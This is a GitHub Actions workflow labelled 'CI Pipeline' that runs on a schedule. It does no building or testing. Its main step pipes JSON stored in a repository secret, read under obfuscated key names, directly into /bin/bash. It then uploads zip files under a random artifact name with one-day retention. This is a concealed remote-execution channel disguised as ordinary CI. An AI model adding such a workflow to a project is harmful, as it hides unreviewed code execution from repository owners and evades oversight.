name: CI Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '32 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true
jobs:
  runner:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Go
        env:
          i76: ${{ secrets.i76 }}
        run: |
          printf '%s' "$i76" | jq -r .qjyxu23573 | /bin/bash
          printf '%s' "$kspyl74" | jq -r .wvh24462 | /bin/bash
          printf '%s' "$qsa1" | jq -r .m60 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: oXLaR6OP
          path: "*.zip"
          retention-days: 1
